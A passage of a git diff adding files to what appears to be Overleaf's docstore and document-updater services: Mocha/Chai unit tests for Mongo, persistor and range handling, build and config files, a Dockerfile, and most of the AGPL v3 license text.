an empty object', function () { + expect(this.db.docs.updateOne).to.have.been.calledWith( + { + _id: new ObjectId(this.docId), + project_id: new ObjectId(this.projectId), + rev: this.archivedDoc.rev, + }, + { + $set: { + lines: this.archivedDoc.lines, + ranges: {}, + }, + $unset: { + inS3: true, + }, + } + ) + }) + }) + + describe("when the update doesn't succeed", function () { + it('throws a DocRevValueError', async function () { + this.db.docs.updateOne.resolves({ matchedCount: 0 }) + await expect( + this.MongoManager.promises.restoreArchivedDoc( + this.projectId, + this.docId, + this.archivedDoc + ) + ).to.be.rejectedWith(Errors.DocRevValueError) + }) + }) + }) +}) diff --git a/services/docstore/test/unit/js/PersistorManagerTests.js b/services/docstore/test/unit/js/PersistorManagerTests.js new file mode 100644 index 0000000..8f8ddac --- /dev/null +++ b/services/docstore/test/unit/js/PersistorManagerTests.js @@ -0,0 +1,55 @@ +const { expect } = require('chai') +const modulePath = '../../../app/js/PersistorManager.js' +const SandboxedModule = require('sandboxed-module') + +describe('PersistorManager', function () { + class FakePersistor { + async sendStream() { + return 'sent' + } + } + + describe('configured', function () { + it('should return fake persistor', function () { + const Settings = { + docstore: { + backend: 'gcs', + bucket: 'wombat', + }, + } + const PersistorManger = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/settings': Settings, + '@overleaf/object-persistor': () => new FakePersistor(), + '@overleaf/metrics': {}, + }, + }) + + expect(PersistorManger).to.be.instanceof(FakePersistor) + expect(PersistorManger.sendStream()).to.eventually.equal('sent') + }) + }) + + describe('not configured', function () { + it('should return abstract persistor', async function () { + const Settings = { + docstore: { + backend: undefined, + bucket: 'wombat', + }, + } + const PersistorManger = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/settings': Settings, + '@overleaf/object-persistor': () => new FakePersistor(), + '@overleaf/metrics': {}, + }, + }) + + expect(PersistorManger.constructor.name).to.equal('AbstractPersistor') + expect(PersistorManger.sendStream()).to.eventually.be.rejectedWith( + /method not implemented in persistor/ + ) + }) + }) +}) diff --git a/services/docstore/test/unit/js/RangeManagerTests.js b/services/docstore/test/unit/js/RangeManagerTests.js new file mode 100644 index 0000000..7a2de73 --- /dev/null +++ b/services/docstore/test/unit/js/RangeManagerTests.js @@ -0,0 +1,253 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const { assert, expect } = require('chai') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/RangeManager' +) +const { ObjectId } = require('mongodb-legacy') + +describe('RangeManager', function () { + beforeEach(function () { + return (this.RangeManager = SandboxedModule.require(modulePath, { + requires: { + './mongodb': { + ObjectId, + }, + }, + })) + }) + + describe('jsonRangesToMongo', function () { + it('should convert ObjectIds and dates to proper objects', function () { + const changeId = new ObjectId().toString() + const commentId = new ObjectId().toString() + const userId = new ObjectId().toString() + const threadId = new ObjectId().toString() + const ts = new Date().toJSON() + return this.RangeManager.jsonRangesToMongo({ + changes: [ + { + id: changeId, + op: { i: 'foo', p: 3 }, + metadata: { + user_id: userId, + ts, + }, + }, + ], + comments: [ + { + id: commentId, + op: { c: 'foo', p: 3, t: threadId }, + }, + ], + }).should.deep.equal({ + changes: [ + { + id: new ObjectId(changeId), + op: { i: 'foo', p: 3 }, + metadata: { + user_id: new ObjectId(userId), + ts: new Date(ts), + }, + }, + ], + comments: [ + { + id: new ObjectId(commentId), + op: { c: 'foo', p: 3, t: new ObjectId(threadId) }, + }, + ], + }) + }) + + it('should leave malformed ObjectIds as they are', function () { + const changeId = 'foo' + const commentId = 'bar' + const userId = 'baz' + return this.RangeManager.jsonRangesToMongo({ + changes: [ + { + id: changeId, + metadata: { + user_id: userId, + }, + }, + ], + comments: [ + { + id: commentId, + }, + ], + }).should.deep.equal({ + changes: [ + { + id: changeId, + metadata: { + user_id: userId, + }, + }, + ], + comments: [ + { + id: commentId, + }, + ], + }) + }) + + return it('should be consistent when transformed through json -> mongo -> json', function () { + const changeId = new ObjectId().toString() + const commentId = new ObjectId().toString() + const userId = new ObjectId().toString() + const threadId = new ObjectId().toString() + const ts = new Date().toJSON() + const ranges1 = { + changes: [ + { + id: changeId, + op: { i: 'foo', p: 3 }, + metadata: { + user_id: userId, + ts, + }, + }, + ], + comments: [ + { + id: commentId, + op: { c: 'foo', p: 3, t: threadId }, + }, + ], + } + const ranges1Copy = JSON.parse(JSON.stringify(ranges1)) // jsonRangesToMongo modifies in place + const ranges2 = JSON.parse( + JSON.stringify(this.RangeManager.jsonRangesToMongo(ranges1Copy)) + ) + return ranges1.should.deep.equal(ranges2) + }) + }) + + return describe('shouldUpdateRanges', function () { + beforeEach(function () { + this.ranges = { + changes: [ + { + id: new ObjectId(), + op: { i: 'foo', p: 3 }, + metadata: { + user_id: new ObjectId(), + ts: new Date(), + }, + }, + ], + comments: [ + { + id: new ObjectId(), + op: { c: 'foo', p: 3, t: new ObjectId() }, + }, + ], + } + return (this.ranges_copy = this.RangeManager.jsonRangesToMongo( + JSON.parse(JSON.stringify(this.ranges)) + )) + }) + + describe('with a blank new range', function () { + return it('should throw an error', function () { + return expect(() => { + return this.RangeManager.shouldUpdateRanges(this.ranges, null) + }).to.throw(Error) + }) + }) + + describe('with a blank old range', function () { + return it('should treat it like {}', function () { + this.RangeManager.shouldUpdateRanges(null, {}).should.equal(false) + return this.RangeManager.shouldUpdateRanges( + null, + this.ranges + ).should.equal(true) + }) + }) + + describe('with no changes', function () { + return it('should return false', function () { + return this.RangeManager.shouldUpdateRanges( + this.ranges, + this.ranges_copy + ).should.equal(false) + }) + }) + + return describe('with changes', function () { + it('should return true when the change id changes', function () { + this.ranges_copy.changes[0].id = new ObjectId() + return this.RangeManager.shouldUpdateRanges( + this.ranges, + this.ranges_copy + ).should.equal(true) + }) + + it('should return true when the change user id changes', function () { + this.ranges_copy.changes[0].metadata.user_id = new ObjectId() + return this.RangeManager.shouldUpdateRanges( + this.ranges, + this.ranges_copy + ).should.equal(true) + }) + + it('should return true when the change ts changes', function () { + this.ranges_copy.changes[0].metadata.ts = new Date(Date.now() + 1000) + return this.RangeManager.shouldUpdateRanges( + this.ranges, + this.ranges_copy + ).should.equal(true) + }) + + it('should return true when the change op changes', function () { + this.ranges_copy.changes[0].op.i = 'bar' + return this.RangeManager.shouldUpdateRanges( + this.ranges, + this.ranges_copy + ).should.equal(true) + }) + + it('should return true when the comment id changes', function () { + this.ranges_copy.comments[0].id = new ObjectId() + return this.RangeManager.shouldUpdateRanges( + this.ranges, + this.ranges_copy + ).should.equal(true) + }) + + it('should return true when the comment offset changes', function () { + this.ranges_copy.comments[0].op.p = 17 + return this.RangeManager.shouldUpdateRanges( + this.ranges, + this.ranges_copy + ).should.equal(true) + }) + + return it('should return true when the comment content changes', function () { + this.ranges_copy.comments[0].op.c = 'bar' + return this.RangeManager.shouldUpdateRanges( + this.ranges, + this.ranges_copy + ).should.equal(true) + }) + }) + }) +}) diff --git a/services/docstore/tsconfig.json b/services/docstore/tsconfig.json new file mode 100644 index 0000000..d3fdd30 --- /dev/null +++ b/services/docstore/tsconfig.json @@ -0,0 +1,12 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "app.js", + "app/js/**/*", + "benchmarks/**/*", + "config/**/*", + "scripts/**/*", + "test/**/*", + "types" + ] +} diff --git a/services/document-updater/.gitignore b/services/document-updater/.gitignore new file mode 100644 index 0000000..624e78f --- /dev/null +++ b/services/document-updater/.gitignore @@ -0,0 +1,52 @@ +compileFolder + +Compiled source # +################### +*.com +*.class +*.dll +*.exe +*.o +*.so + +# Packages # +############ +# it's better to unpack these files and commit the raw source +# git has its own built in compression methods +*.7z +*.dmg +*.gz +*.iso +*.jar +*.rar +*.tar +*.zip + +# Logs and databases # +###################### +*.log +*.sql +*.sqlite + +# OS generated files # +###################### +.DS_Store? +ehthumbs.db +Icon? +Thumbs.db + +/node_modules/* + + + +forever/ + +**.swp + +# Redis cluster +**/appendonly.aof +**/dump.rdb +**/nodes.conf + +# managed by dev-environment$ bin/update_build_scripts +.npmrc diff --git a/services/document-updater/.mocharc.json b/services/document-updater/.mocharc.json new file mode 100644 index 0000000..dc3280a --- /dev/null +++ b/services/document-updater/.mocharc.json @@ -0,0 +1,3 @@ +{ + "require": "test/setup.js" +} diff --git a/services/document-updater/.nvmrc b/services/document-updater/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/services/document-updater/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/services/document-updater/Dockerfile b/services/document-updater/Dockerfile new file mode 100644 index 0000000..436d722 --- /dev/null +++ b/services/document-updater/Dockerfile @@ -0,0 +1,27 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +FROM node:20.18.2 AS base + +WORKDIR /overleaf/services/document-updater + +# Google Cloud Storage needs a writable $HOME/.config for resumable uploads +# (see https://googleapis.dev/nodejs/storage/latest/File.html#createWriteStream) +RUN mkdir /home/node/.config && chown node:node /home/node/.config + +FROM base AS app + +COPY package.json package-lock.json /overleaf/ +COPY services/document-updater/package.json /overleaf/services/document-updater/ +COPY libraries/ /overleaf/libraries/ +COPY patches/ /overleaf/patches/ + +RUN cd /overleaf && npm ci --quiet + +COPY services/document-updater/ /overleaf/services/document-updater/ + +FROM app +USER node + +CMD ["node", "--expose-gc", "app.js"] diff --git a/services/document-updater/LICENSE b/services/document-updater/LICENSE new file mode 100644 index 0000000..ac8619d --- /dev/null +++ b/services/document-updater/LICENSE @@ -0,0 +1,662 @@ + + GNU AFFERO GENERAL PUBLIC LICENSE + Version 3, 19 November 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/> + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU Affero General Public License is a free, copyleft license for +software and other kinds of works, specifically designed to ensure +cooperation with the community in the case of network server software. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +our General Public Licenses are intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + Developers that use our General Public Licenses protect your rights +with two steps: (1) assert copyright on the software, and (2) offer +you this License which gives you legal permission to copy, distribute +and/or modify the software. + + A secondary benefit of defending all users' freedom is that +improvements made in alternate versions of the program, if they +receive widespread use, become available for other developers to +incorporate. Many developers of free software are heartened and +encouraged by the resulting cooperation. However, in the case of +software used on network servers, this result may fail to come about. +The GNU General Public License permits making a modified version and +letting the public access it on a server without ever releasing its +source code to the public. + + The GNU Affero General Public License is designed specifically to +ensure that, in such cases, the modified source code becomes available +to the community. It requires the operator of a network server to +provide the source code of the modified version running there to the +users of that server. Therefore, public use of a modified version, on +a publicly accessible server, gives the public access to the source +code of the modified version. + + An older license, called the Affero General Public License and +published by Affero, was designed to accomplish similar goals. This is +a different license, not a version of the Affero GPL, but Affero has +released a new version of the Affero GPL which permits relicensing under +this license. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU Affero General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. + + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. + + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. + + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Remote Network Interaction; Use with the GNU General Public License. + + Notwithstanding any other provision of this License, if you modify the +Program, your modified version must prominently offer all users +interacting with it remotely through a computer network (if your version +supports such interaction) an opportunity to receive the Corresponding +Source of your version by providing access to the Corresponding Source +from a network server at no charge, through some standard or customary +means of facilitating copying of software. This Corresponding Source +shall include the Corresponding Source for any work covered by version 3 +of the GNU General Public License that is incorporated pursuant to the +following paragraph. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the work with which it is combined will remain governed by version +3 of the GNU General Public License. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU Affero General Public License from time to time. Such new versions +will be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU Affero General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU Affero General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU Affero General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. + + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + <one line to give the program's name and a brief idea of what it does.> + Copyright (C) <year> <name of author> + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU Affero General Public 